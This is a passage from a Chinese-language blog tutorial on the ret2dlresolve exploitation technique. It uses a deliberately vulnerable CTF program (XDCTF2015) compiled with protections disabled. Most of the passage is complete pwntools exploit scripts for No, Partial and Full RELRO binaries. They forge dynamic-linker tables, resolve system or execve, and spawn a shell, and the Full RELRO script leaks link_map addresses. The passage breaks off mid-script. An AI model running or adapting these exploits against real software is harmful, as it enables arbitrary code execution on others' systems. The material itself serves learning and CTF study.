<li>由于步骤3清空的动态链接器之前查找到的地址，因此再调用该函数时，动态链接器会重新调用<code>_dl_runtime_resolve()</code>来查找该函数载入的地址，而此时该函数的字符串已经修改为恶意的函数（如system、execve等），那么最终查找到的地址为恶意函数的地址，由此攻击成功</li>
</ol>
<p><strong>Q</strong>：</p>
<figure class="highlight c"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;string.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;unistd.h&gt;</span></span><br><br><span class="hljs-type">void</span> <span class="hljs-title function_">vuln</span><span class="hljs-params">()</span> {<br>    <span class="hljs-type">char</span> buf[<span class="hljs-number">100</span>];<br>    setbuf(<span class="hljs-built_in">stdin</span>, buf);<br>    read(<span class="hljs-number">0</span>, buf, <span class="hljs-number">256</span>);<br>}<br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span> {<br>    <span class="hljs-type">char</span> buf[<span class="hljs-number">100</span>] = <span class="hljs-string">"Welcome to XDCTF2015~!\n"</span>;<br>    setbuf(<span class="hljs-built_in">stdout</span>, buf);<br>    write(<span class="hljs-number">1</span>, buf, <span class="hljs-built_in">strlen</span>(buf));<br>    vuln();<br>    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br></code></pre></td></tr></tbody></table></figure>

<figure class="highlight shell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">gcc -fno-stack-protector -m32 -z norelro -no-pie main.c -o main_norelro_32<br></code></pre></td></tr></tbody></table></figure>

<p><strong>EXP</strong>：</p>
<figure class="highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># encoding=utf-8</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br><span class="hljs-comment"># context.log_level="debug"</span><br>context.terminal = [<span class="hljs-string">"tmux"</span>,<span class="hljs-string">"splitw"</span>,<span class="hljs-string">"-h"</span>]<br>context.arch=<span class="hljs-string">"i386"</span><br><br>sh = process(<span class="hljs-string">"./main_no_relro_32"</span>)<br>rop = ROP(<span class="hljs-string">"./main_no_relro_32"</span>)<br>elf = ELF(<span class="hljs-string">"./main_no_relro_32"</span>)<br><br>sh.recvuntil(<span class="hljs-string">b'Welcome to XDCTF2015~!\n'</span>)<br><br>offset = <span class="hljs-number">0x70</span><br>dynstr_addr = <span class="hljs-number">0x08049804</span> + <span class="hljs-number">4</span><br>dynstr = elf.get_section_by_name(<span class="hljs-string">'.dynstr'</span>).data()<br>dynstr = dynstr.replace(<span class="hljs-string">b"read"</span>,<span class="hljs-string">b"system"</span>)<br><br>bss_end_addr = <span class="hljs-number">0x80498e0</span><br><br>read_got_addr = <span class="hljs-number">0x80498c8</span><br>read_plt_addr = <span class="hljs-number">0x8048370</span><br>read_plt_next_addr = <span class="hljs-number">0x08048376</span><br><br>pop_12 = <span class="hljs-number">0x0804834a</span><br><br>rop.raw(<span class="hljs-string">b'a'</span> * offset)<br><span class="hljs-comment"># modify .dynstr pointer</span><br>rop.read(<span class="hljs-number">0</span>, dynstr_addr, <span class="hljs-number">4</span>)<br><span class="hljs-comment"># construct fake .dynstr</span><br>rop.read(<span class="hljs-number">0</span>, bss_end_addr, <span class="hljs-built_in">len</span>(dynstr))<br><span class="hljs-comment"># construct string "/bin/sh"</span><br>rop.read(<span class="hljs-number">0</span>, bss_end_addr + <span class="hljs-built_in">len</span>(dynstr) + <span class="hljs-number">1</span>, <span class="hljs-built_in">len</span>(<span class="hljs-string">b"/bin/sh\x00"</span>))<br><span class="hljs-comment"># change got of read to next addr of read's plt</span><br>rop.read(<span class="hljs-number">0</span>, read_got_addr, <span class="hljs-number">4</span>)<br>rop.raw(read_plt_addr)<br>rop.raw(<span class="hljs-number">0xdeadbeef</span>)  <span class="hljs-comment"># fake ret</span><br>rop.raw(bss_end_addr + <span class="hljs-built_in">len</span>(dynstr) + <span class="hljs-number">1</span>)  <span class="hljs-comment"># arg1</span><br><br><span class="hljs-keyword">assert</span>(<span class="hljs-built_in">len</span>(rop.chain()) &lt;= <span class="hljs-number">256</span>)<br>rop.raw(<span class="hljs-string">b"a"</span> * (<span class="hljs-number">256</span> - <span class="hljs-built_in">len</span>(rop.chain())))<br><br>sh.send(rop.chain())<br>sh.send(p32(bss_end_addr))<br>sh.send(dynstr)<br>sh.send(<span class="hljs-string">b"/bin/sh\x00"</span>)<br>sh.send(p32(read_plt_next_addr))<br><br>sh.interactive()<br></code></pre></td></tr></tbody></table></figure>

<blockquote>
<p>请注意使用python3.7，否则ROP链会存在问题（REL解析出错）</p>
</blockquote>
<p><img src="/2023/10/13/Ret2dlresolve%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/12.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="Partial-RELRO"><a href="#Partial-RELRO" class="headerlink" title="Partial RELRO"></a>Partial RELRO</h3><p>如下编译源文件：</p>
<figure class="highlight shell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">gcc -fno-stack-protector -m32 -z relro -z lazy -no-pie ../../main.c -o main_partial_relro_32<br></code></pre></td></tr></tbody></table></figure>

<p>在Partial RELRO的条件下，<code>.dynamic</code>全部只读，因此不能像上述通过修改指针进行利用。那我们该如何利用了？</p>
<p>在Q7中，我们知道<code>_dl_runtime_resolve(link_map, reloc_index)</code>的两个参数都是通过PLT传入堆栈的，第2个参数在<code>func@plt</code>中被压入堆栈，第1个参数在<code>PLT[0]</code>中被压入堆栈；<strong>如果我们提前在堆栈中构造<code>reloc_index</code>，并将其指向精心伪造的空间（重定位表项<code>.rel.plt</code>、动态符号表<code>.dynsym</code>和动态字符串<code>.dyn_str</code>），那么就可以混淆动态载入的函数了</strong>。</p>
<p><span class="github-emoji"><span>⭐</span><img src="https://github.githubassets.com/images/icons/emoji/unicode/2b50.png?v8" srcset="/img/loading.gif" lazyload aria-hidden="true" onerror="this.parent.classList.add('github-emoji-fallback')"></span> 此攻击能够成功的原因在于——<strong>动态链接器寻址使用相对偏移量</strong>：</p>
<ul>
<li>reloc_index: index of .rel.plt item</li>
<li>r_info: index of .dynsym item</li>
<li>st_name: index of string of .dynstr</li>
</ul>
<p>Partial RELRO具体攻击步骤：</p>
<ol>
<li>跳转到<code>PLT[0]</code>：<code>PLT[X]（X&gt;0）</code>中进行的操作是将<code>reloc_index</code>压入栈（相应的，也要提前把函数参数送入栈中），这里提前构造虚假的<code>reloc_index</code>指向我们自己构造的<code>Elf_Rel</code>项，然后跳转到<code>PLT[0]</code>，接着往堆栈中压入<code>link_map</code>，紧接着就是调用<code>_dl_runtime_resolve</code>；</li>
<li>在虚假的<code>Elf_Rel</code>项中，构造虚假的<code>r_info</code>指向虚假的<code>.dynsym</code>的<code>Elf_Sym</code>项（这里由于<code>r_info</code>过大可能会导致检查version hash时出错，这里需要调整<code>.dynsym</code>的地址）</li>
<li>在虚假的<code>Elf_Sym</code>项中，<code>st_name</code>指向虚假的字符串，如<code>system</code>；</li>
</ol>
<p>尝试一下：</p>
<figure class="highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#encoding=utf-8</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br><span class="hljs-comment"># context.log_level="debug"</span><br><br>elf = ELF(<span class="hljs-string">'./main_partial_relro_32'</span>)<br>sh = process(<span class="hljs-string">'./main_partial_relro_32'</span>)<br>rop = ROP(<span class="hljs-string">'./main_partial_relro_32'</span>)<br><br>sh.recvuntil(<span class="hljs-string">b'Welcome to XDCTF2015~!\n'</span>)<br><br>offset = <span class="hljs-number">0x70</span><br>bss_addr = elf.bss()<br>stack_size = <span class="hljs-number">0x800</span><br><br>stack_base = bss_addr + stack_size + <span class="hljs-number">0x10</span> * <span class="hljs-number">40</span>  <span class="hljs-comment"># stack grows from high address to low address!</span><br><br>rop.raw(<span class="hljs-string">b'a'</span> * offset)<br>rop.read(<span class="hljs-number">0</span>, stack_base, <span class="hljs-number">100</span>)<br>rop.migrate(stack_base)  <span class="hljs-comment"># &lt;-- ebp to bss_addr (pop ebp; ret) and leave to ebp (leave[esp = ebp; pop ebp;]; ret)</span><br><span class="hljs-comment"># notice that the addr stored in stack is stack_base - 4</span><br><br>sh.sendline(rop.chain())<br><br>rop = ROP(<span class="hljs-string">'./main_partial_relro_32'</span>)<br>sh_str = <span class="hljs-string">b"/bin/sh\x00"</span><br><br>plt0 = elf.get_section_by_name(<span class="hljs-string">'.plt'</span>).header.sh_addr<br>got0 = elf.get_section_by_name(<span class="hljs-string">'.got'</span>).header.sh_addr<br><br>rel_plt = elf.get_section_by_name(<span class="hljs-string">'.rel.plt'</span>).header.sh_addr<br>dynsym_addr = elf.get_section_by_name(<span class="hljs-string">'.dynsym'</span>).header.sh_addr<br>dynstr_addr = elf.get_section_by_name(<span class="hljs-string">'.dynstr'</span>).header.sh_addr<br><br>write_reloc_offset = stack_base + <span class="hljs-number">24</span> - rel_plt<br>r_offset = write_got = elf.got[<span class="hljs-string">"write"</span>]<br><br>fake_sym_addr = stack_base + <span class="hljs-number">32</span><br>align = <span class="hljs-number">0x10</span> - ((fake_sym_addr - dynsym_addr) &amp; <span class="hljs-number">0xf</span>) <span class="hljs-comment"># align to 0x10</span><br>fake_sym_addr += align<br>index_dynsym = (fake_sym_addr - dynsym_addr) // <span class="hljs-number">0x10</span><br>fake_str_addr = fake_sym_addr + <span class="hljs-number">16</span><br>st_name = (fake_str_addr - dynstr_addr)<br>fake_write_sym = flat([st_name, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0x12</span>])<br><br>r_info = (index_dynsym &lt;&lt; <span class="hljs-number">8</span>) + <span class="hljs-number">0x7</span><br><br>rop.raw(plt0)  <span class="hljs-comment"># jmp plt[0]</span><br>rop.raw(write_reloc_offset)  <span class="hljs-comment"># push offset</span><br>rop.raw(<span class="hljs-string">'fake'</span>)  <span class="hljs-comment"># fake ret</span><br>rop.raw(stack_base + <span class="hljs-number">80</span>)<br>rop.raw(<span class="hljs-number">0</span>)<br>rop.raw(<span class="hljs-number">0</span>)<br><br><span class="hljs-string">'''</span><br><span class="hljs-string">rop.write(1, stack_base + 80, len(sh_str))</span><br><span class="hljs-string">execve("/bin/sh", 0, 0)</span><br><span class="hljs-string">'''</span><br><br><span class="hljs-comment"># fake .rel.plt entry [r_offset, r_info]</span><br>rop.raw(r_offset)<br>rop.raw(r_info)<br><br><span class="hljs-comment"># fake .dynsym entry</span><br>rop.raw(<span class="hljs-string">b'a'</span> * align)<br>rop.raw(fake_write_sym)<br><br><span class="hljs-comment"># fake .dynstr</span><br>rop.raw(<span class="hljs-string">b'execve\x00'</span>)<br><br>rop.raw(<span class="hljs-string">b'a'</span> * (<span class="hljs-number">80</span> - <span class="hljs-built_in">len</span>(rop.chain())))<br>rop.raw(sh_str)<br>rop.raw(<span class="hljs-string">b'a'</span> * (<span class="hljs-number">100</span> - <span class="hljs-built_in">len</span>(rop.chain())))<br><br>sh.sendline(rop.chain())<br><br>sh.interactive()<br></code></pre></td></tr></tbody></table></figure>

<p>结果成了：</p>
<p><img src="/2023/10/13/Ret2dlresolve%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/13.png" srcset="/img/loading.gif" lazyload></p>
<blockquote>
<p>可能会存在的问题：</p>
<ul>
<li>Glibc解析动态链接时可能存在version-hash混淆问题，具体详见<a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/advanced-rop/ret2dlresolve/#stage-4">ret2dlresolve - CTF Wiki (ctf-wiki.org)</a></li>
</ul>
</blockquote>
<p>除此之外，你也可以使用基于工具的伪造，如Roputil或pwntools：</p>
<figure class="highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context.binary = elf = ELF(<span class="hljs-string">"./main_partial_relro_32"</span>)<br>rop = ROP(context.binary)<br>dlresolve = Ret2dlresolvePayload(elf,symbol=<span class="hljs-string">"system"</span>,args=[<span class="hljs-string">"/bin/sh"</span>])<br><span class="hljs-comment"># pwntools will help us choose a proper addr</span><br><span class="hljs-comment"># https://github.com/Gallopsled/pwntools/blob/5db149adc2/pwnlib/rop/ret2dlresolve.py#L237</span><br>rop.read(<span class="hljs-number">0</span>,dlresolve.data_addr)<br>rop.ret2dlresolve(dlresolve)<br>raw_rop = rop.chain()<br>io = process(<span class="hljs-string">"./main_partial_relro_32"</span>)<br>io.recvuntil(<span class="hljs-string">"Welcome to XDCTF2015~!\n"</span>)<br>payload = flat({<span class="hljs-number">112</span>:raw_rop,<span class="hljs-number">256</span>:dlresolve.payload})<br>io.sendline(payload)<br>io.interactive()<br></code></pre></td></tr></tbody></table></figure>

<h3 id="Full-RELRO"><a href="#Full-RELRO" class="headerlink" title="Full RELRO"></a>Full RELRO</h3><p>如下编译源文件：</p>
<figure class="highlight shell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">gcc -fno-stack-protector -m32 -z relro -z now -no-pie ../../main.c -o main_partial_relro_32<br></code></pre></td></tr></tbody></table></figure>

<p><img src="/2023/10/13/Ret2dlresolve%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/14.png" srcset="/img/loading.gif" lazyload></p>
<p>开启了<code>Full RELRO</code>之后，所有GOT表中的函数都会在程序执行前被动态载入，如下所示：</p>
<p><img src="/2023/10/13/Ret2dlresolve%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/15.png" srcset="/img/loading.gif" lazyload></p>
<p>除此之外，我们再来看一下GOT表的情况：</p>
<p><img src="/2023/10/13/Ret2dlresolve%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/17.png" srcset="/img/loading.gif" lazyload></p>
<p>我们可以看到<code>link_map</code>地址和<code>_dl_runtime_resolve()</code>的地址都已被设置为0了。这样一来，在不知道<code>_dl_runtime_resolve()</code>地址和<code>link_map</code>信息的前提下，我们是没有办法进行攻击的。参考资料[3]的论文给出了一种攻击手段，主要通过<strong>信息泄露</strong>来获得相关信息：</p>
<p><span class="github-emoji"><span>1⃣</span><img src="https://github.githubassets.com/images/icons/emoji/unicode/0031-20e3.png?v8" srcset="/img/loading.gif" lazyload aria-hidden="true" onerror="this.parent.classList.add('github-emoji-fallback')"></span> <code>link_map</code>地址：从<code>DT_DEBUG</code>中进行恢复</p>
<p>这里需要介绍一下<code>DT_DEBUG</code>存放的<code>r_debug</code>结构体：</p>
<figure class="highlight cpp"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-keyword">struct</span> <span class="hljs-title class_">r_debug</span><br>  {<br>    <span class="hljs-comment">/* Version number for this protocol.  It should be greater than 0.  */</span><br>    <span class="hljs-type">int</span> r_version;<br>    <span class="hljs-keyword">struct</span> <span class="hljs-title class_">link_map</span> *r_map;	<span class="hljs-comment">/* Head of the chain of loaded objects.  */</span><br>    <span class="hljs-comment">/* This is the address of a function internal to the run-time linker,</span><br><span class="hljs-comment">       that will always be called when the linker begins to map in a</span><br><span class="hljs-comment">       library or unmap it, and again when the mapping change is complete.</span><br><span class="hljs-comment">       The debugger can set a breakpoint at this address if it wants to</span><br><span class="hljs-comment">       notice shared object mapping changes.  */</span><br>    <span class="hljs-built_in">ElfW</span>(Addr) r_brk;<br>    <span class="hljs-keyword">enum</span><br>      {<br>	<span class="hljs-comment">/* This state value describes the mapping change taking place when</span><br><span class="hljs-comment">	   the `r_brk' address is called.  */</span><br>	RT_CONSISTENT,		<span class="hljs-comment">/* Mapping change is complete.  */</span><br>	RT_ADD,			<span class="hljs-comment">/* Beginning to add a new object.  */</span><br>	RT_DELETE		<span class="hljs-comment">/* Beginning to remove an object mapping.  */</span><br>      } r_state;<br>    <span class="hljs-built_in">ElfW</span>(Addr) r_ldbase;	<span class="hljs-comment">/* Base address the linker is loaded at.  */</span><br>  };<br></code></pre></td></tr></tbody></table></figure>

<p>其中<code>r_map</code>指针就是<code>link_map</code>的地址，这样一来我们就通过<code>r_debug</code>结构体的信息泄露得到了<code>link_map</code>的地址；</p>
<p><span class="github-emoji"><span>2⃣</span><img src="https://github.githubassets.com/images/icons/emoji/unicode/0032-20e3.png?v8" srcset="/img/loading.gif" lazyload aria-hidden="true" onerror="this.parent.classList.add('github-emoji-fallback')"></span> <code>_dl_runtime_resolve()</code>的地址</p>
<p><code>_dl_runtime_resolve()</code>地址的恢复是很巧妙的，其主要的思想是通过访问应用载入库中没有被Full RELRO保护的ELF目标，然后获得该目标中的<code>_dl_runtime_resolve()</code>的地址。这里通过访问上述<code>link_map</code>的<code>l_next</code>对象来遍历所有载入的ELF目标的<code>link_map</code>信息，然后根据<code>DT_PLTGOT</code>是否为0来判断该目标是否可利用（如果为0，可能是Full RELRO保护的目标或者静态库）。如果目标可利用，那么根据GOT表的信息即可得到<code>_dl_runtime_resolve()</code>的地址。</p>
<p>在获取上述两个地址之后，我们就可以使用Partial RELRO中的攻击手段进行攻击。</p>
<p>我们稍微简单的总结一下Full RELRO的攻击手段：</p>
<ol>
<li><p>根据<code>DT_DEBUG</code>泄露的信息得到<code>link_map</code>地址；</p>
</li>
<li><p>遍历<code>link_map</code>链表中其他所有的<code>link_map</code>，找到可利用的<code>_dl_runtime_resolve()</code>的地址；</p>
</li>
<li><p>提前将<code>reloc_offset</code>和<code>link_map</code>压入堆栈，程序执行流调用<code>_dl_runtime_resolve()</code>;</p>
</li>
<li><p><code>reloc_offset</code>指向我们构造的虚假的<code>.rel.plt</code> [r_offset, r_info] 结构；</p>
<p><strong>这里需要注意的是<code>r_offset</code>成员必须指向一个可以写的内存空间，否则在调用完<code>_dl_runtime_resolve()</code>时会报错！</strong></p>
</li>
<li><p><code>r_info</code>的高8位为<code>.dynsym</code> [st_name, …, …, …] 结构的偏移量，其中<code>st_name</code>查找函数名在虚假的<code>.dyn.str</code>字符串中的偏移量（因此这里还需要构造一个虚假的<code>.dyn.str</code>结构）；</p>
</li>
<li><p>至此，攻击链构造完毕:happy: 。</p>
</li>
</ol>
<p><strong>EXP：</strong></p>
<figure class="highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#encoding=utf-8</span><br><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br><span class="hljs-comment"># context.log_level="debug"</span><br><br>sh = process(<span class="hljs-string">"./main_full_relro_32"</span>)<br>rop = ROP(<span class="hljs-string">"./main_full_relro_32"</span>)<br>elf = ELF(<span class="hljs-string">"./main_full_relro_32"</span>)<br><br>r_debug = elf.get_section_by_name(<span class="hljs-string">'.dynamic'</span>).header.sh_addr + <span class="hljs-number">25</span> * <span class="hljs-number">4</span><br><br>offset = <span class="hljs-number">0x70</span><br>bss_addr = elf.bss()<br>stack_size = <span class="hljs-number">0x800</span><br>stack_base = bss_addr + stack_size;<br>sh_str = <span class="hljs-string">b'/bin/sh\x00'</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">change_stack_addr</span>(<span class="hljs-params">stack_base</span>):<br>    <span class="hljs-keyword">if</span> stack_base != bss_addr + stack_size:<br>        stack_base = bss_addr + stack_size<br>    <span class="hljs-keyword">else</span>:<br>        stack_base = bss_addr + stack_size - <span class="hljs-number">0x100</span><br>    <span class="hljs-keyword">return</span> stack_base<br><br><span class="hljs-comment"># first leak r_debug</span><br>sh.recvuntil(<span class="hljs-string">b'Welcome to XDCTF2015~!\n'</span>)<br><br>stack_base = change_stack_addr(stack_base)<br>rop.raw(<span class="hljs-string">b'a'</span> * offset)<br>rop.write(<span class="hljs-number">1</span>, r_debug, <span class="hljs-number">4</span>)<br>rop.read(<span class="hljs-number">0</span>, stack_base, <span class="hljs-number">100</span>)<br>rop.migrate(stack_base)<br>sh.sendline(rop.chain())<br>r_debug_addr = u32(sh.recv(<span class="hljs-number">4</span>))<br><br><span class="hljs-comment"># second leak r_map (link_map)</span><br>stack_base = change_stack_addr(stack_base)<br>rop = ROP(<span class="hljs-string">"./main_full_relro_32"</span>)<br>rop.write(<span class="hljs-number">1</span>, r_debug_addr + <span class="hljs-number">4</span>, <span class="hljs-number">4</span>)<br>rop.read(<span class="hljs-number">0</span>, stack_base, <span class="hljs-number">100</span>)<br>rop.migrate(stack_base)<br>sh.sendline(rop.chain())<br>r_map_addr = link_map_addr = u32(sh.recv(<span class="hljs-number">4</span>))<br><span class="hljs-built_in">print</span>(<span class="hljs-string">"[*] The address of link_map is"</span>, <span class="hljs-built_in">hex</span>(r_map_addr))<br><br><span class="hljs-comment"># third find _dl_runtime_resolve</span><br><span class="hljs-comment"># traverse the linked list of linkmap to find _dl_runtime_resolve() addr</span><br>link_map_l_next_addr = link_map_addr<br>is_found = <span class="hljs-literal">False</span><br><span class="hljs-keyword">while</span>(<span class="hljs-number">1</span>):<br>    stack_base = change_stack_addr(stack_base) <br>    rop = ROP(<span class="hljs-string">"./main_full_relro_32"</span>)<br>    link_map_l_next = link_map_l_next_addr + <span class="hljs-number">3</span> * <span class="hljs-number">4</span><br>    rop.write(<span class="hljs-number">1</span>, link_map_l_next, <span class="hljs-number">4</span>)<br>    rop.read(<span class="hljs-number">0</span>, stack_base, <span class="hljs-number">100</span>)<br>    rop.migrate(stack_base)<br>    sh.sendline(rop.chain())<br>    link_map_l_next_addr = u32(sh.recv(<span class="hljs-number">4</span>))<br>    <br>    <span class="hljs-keyword">if</span> link_map_l_next_addr == <span class="hljs-number">0</span>:<br>        <span class="hljs-keyword">break</span><br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">"[*] The address of next link_map is"</span>, <span class="hljs-built_in">hex</span>(link_map_l_next_addr))<br>    <br>    dyn_pltgot_ptr_addr = link_map_l_next_addr + <span class="hljs-number">8</span> * <span class="hljs-number">4</span> + <span class="hljs-number">3</span> * <span class="hljs-number">4</span><br>    stack_base = change_stack_addr(stack_base)<br>    rop = 